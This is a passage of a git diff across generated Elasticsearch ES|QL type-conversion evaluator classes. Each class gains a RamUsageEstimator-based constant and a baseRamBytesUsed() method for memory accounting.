b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromLongEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.LongBlock; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. 
*/ public final class ToBooleanFromLongEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToBooleanFromLongEvaluator.class); + private final EvalOperator.ExpressionEvaluator l; public ToBooleanFromLongEvaluator(Source source, EvalOperator.ExpressionEvaluator l, @@ -99,6 +102,13 @@ public void close() { Releasables.closeExpectNoException(l); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += l.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromStringEvaluator.java index 9e7fb934b29eb..2efbec8a1e43c 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromStringEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromStringEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToBooleanFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToBooleanFromStringEvaluator.class); + private final EvalOperator.ExpressionEvaluator keyword; public ToBooleanFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator keyword, @@ -102,6 +105,13 @@ public void close() { Releasables.closeExpectNoException(keyword); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += keyword.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromUnsignedLongEvaluator.java index f26e375b269f3..5aeaf87635e18 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromUnsignedLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromUnsignedLongEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.LongBlock; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. 
*/ public final class ToBooleanFromUnsignedLongEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToBooleanFromUnsignedLongEvaluator.class); + private final EvalOperator.ExpressionEvaluator ul; public ToBooleanFromUnsignedLongEvaluator(Source source, EvalOperator.ExpressionEvaluator ul, @@ -99,6 +102,13 @@ public void close() { Releasables.closeExpectNoException(ul); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += ul.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToCartesianPointFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToCartesianPointFromStringEvaluator.java index 72de57bbbbd77..5804eaf792c97 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToCartesianPointFromStringEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToCartesianPointFromStringEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. 
*/ public final class ToCartesianPointFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToCartesianPointFromStringEvaluator.class); + private final EvalOperator.ExpressionEvaluator in; public ToCartesianPointFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator in, @@ -116,6 +119,13 @@ public void close() { Releasables.closeExpectNoException(in); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToCartesianShapeFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToCartesianShapeFromStringEvaluator.java index b1080b0639df7..13ac62ab3cac8 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToCartesianShapeFromStringEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToCartesianShapeFromStringEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToCartesianShapeFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToCartesianShapeFromStringEvaluator.class); + private final EvalOperator.ExpressionEvaluator in; public ToCartesianShapeFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator in, @@ -116,6 +119,13 @@ public void close() { Releasables.closeExpectNoException(in); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromDatetimeEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromDatetimeEvaluator.java index 83f9226f61b9e..aba3bf7e4bcd9 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromDatetimeEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromDatetimeEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -21,6 +22,8 @@ * This class is generated. 
Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToDateNanosFromDatetimeEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToDateNanosFromDatetimeEvaluator.class); + private final EvalOperator.ExpressionEvaluator in; public ToDateNanosFromDatetimeEvaluator(Source source, EvalOperator.ExpressionEvaluator in, @@ -113,6 +116,13 @@ public void close() { Releasables.closeExpectNoException(in); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromDoubleEvaluator.java index 6bc6f4ab1b2d0..defd4c0bb0ddc 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromDoubleEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToDateNanosFromDoubleEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToDateNanosFromDoubleEvaluator.class); + private final EvalOperator.ExpressionEvaluator in; public ToDateNanosFromDoubleEvaluator(Source source, EvalOperator.ExpressionEvaluator in, @@ -115,6 +118,13 @@ public void close() { Releasables.closeExpectNoException(in); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromLongEvaluator.java index ee0c9f39b6d7e..002e141bb3331 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -21,6 +22,8 @@ * This class is generated. 
Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToDateNanosFromLongEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToDateNanosFromLongEvaluator.class); + private final EvalOperator.ExpressionEvaluator in; public ToDateNanosFromLongEvaluator(Source source, EvalOperator.ExpressionEvaluator in, @@ -113,6 +116,13 @@ public void close() { Releasables.closeExpectNoException(in); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromStringEvaluator.java index 040a17efbfee8..d72071c50dcae 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromStringEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromStringEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToDateNanosFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToDateNanosFromStringEvaluator.class); + private final EvalOperator.ExpressionEvaluator in; public ToDateNanosFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator in, @@ -117,6 +120,13 @@ public void close() { Releasables.closeExpectNoException(in); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDatetimeFromDateNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDatetimeFromDateNanosEvaluator.java index eab1eafe4c713..9d347889ae8f3 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDatetimeFromDateNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDatetimeFromDateNanosEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -21,6 +22,8 @@ * This class is generated. 
Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToDatetimeFromDateNanosEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToDatetimeFromDateNanosEvaluator.class); + private final EvalOperator.ExpressionEvaluator in; public ToDatetimeFromDateNanosEvaluator(Source source, EvalOperator.ExpressionEvaluator in, @@ -113,6 +116,13 @@ public void close() { Releasables.closeExpectNoException(in); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDatetimeFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDatetimeFromStringEvaluator.java index e27879468e1e4..1fc6d971f2665 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDatetimeFromStringEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDatetimeFromStringEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToDatetimeFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToDatetimeFromStringEvaluator.class); + private final EvalOperator.ExpressionEvaluator in; public ToDatetimeFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator in, @@ -117,6 +120,13 @@ public void close() { Releasables.closeExpectNoException(in); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDegreesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDegreesEvaluator.java index cdf4d3b1f9fb9..4fbaa17c2f94e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDegreesEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDegreesEvaluator.java @@ -7,6 +7,7 @@ import java.lang.ArithmeticException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. 
*/ public final class ToDegreesEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToDegreesEvaluator.class); + private final EvalOperator.ExpressionEvaluator deg; public ToDegreesEvaluator(Source source, EvalOperator.ExpressionEvaluator deg, @@ -113,6 +116,13 @@ public void close() { Releasables.closeExpectNoException(deg); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += deg.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromBooleanEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromBooleanEvaluator.java index 1b93b7e7b3268..374e6959e342e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromBooleanEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromBooleanEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToDoubleFromBooleanEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToDoubleFromBooleanEvaluator.class); + private final EvalOperator.ExpressionEvaluator bool; public ToDoubleFromBooleanEvaluator(Source source, EvalOperator.ExpressionEvaluator bool, @@ -99,6 +102,13 @@ public void close() { Releasables.closeExpectNoException(bool); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += bool.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromIntEvaluator.java index 66771ed47eaec..504a9ebd2ea8e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromIntEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.IntBlock; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. 
*/ public final class ToDoubleFromIntEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToDoubleFromIntEvaluator.class); + private final EvalOperator.ExpressionEvaluator i; public ToDoubleFromIntEvaluator(Source source, EvalOperator.ExpressionEvaluator i, @@ -99,6 +102,13 @@ public void close() { Releasables.closeExpectNoException(i); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += i.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromLongEvaluator.java index 651ba0f816ae4..e1b885000dd84 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromLongEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.LongBlock; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToDoubleFromLongEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToDoubleFromLongEvaluator.class); + private final EvalOperator.ExpressionEvaluator l; public ToDoubleFromLongEvaluator(Source source, EvalOperator.ExpressionEvaluator l, @@ -99,6 +102,13 @@ public void close() { Releasables.closeExpectNoException(l); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += l.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromStringEvaluator.java index 9c9bb3f5a057a..d10721c0aaa20 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromStringEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromStringEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. 
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromStringEvaluator.java
index 9c9bb3f5a057a..d10721c0aaa20 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromStringEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromStringEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.BytesRefVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToDoubleFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToDoubleFromStringEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator in;

   public ToDoubleFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator in,
@@ -117,6 +120,13 @@ public void close() {
     Releasables.closeExpectNoException(in);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += in.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromUnsignedLongEvaluator.java
index 8e390bf79f68a..7ff0b68ea1262 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromUnsignedLongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromUnsignedLongEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.LongBlock;
@@ -21,6 +22,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToDoubleFromUnsignedLongEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToDoubleFromUnsignedLongEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator l;

   public ToDoubleFromUnsignedLongEvaluator(Source source, EvalOperator.ExpressionEvaluator l,
@@ -99,6 +102,13 @@ public void close() {
     Releasables.closeExpectNoException(l);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += l.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToGeoPointFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToGeoPointFromStringEvaluator.java
index 1cbc3946f93f8..c02e3b52b10ed 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToGeoPointFromStringEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToGeoPointFromStringEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.BytesRefVector;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToGeoPointFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToGeoPointFromStringEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator in;

   public ToGeoPointFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator in,
@@ -116,6 +119,13 @@ public void close() {
     Releasables.closeExpectNoException(in);
   }
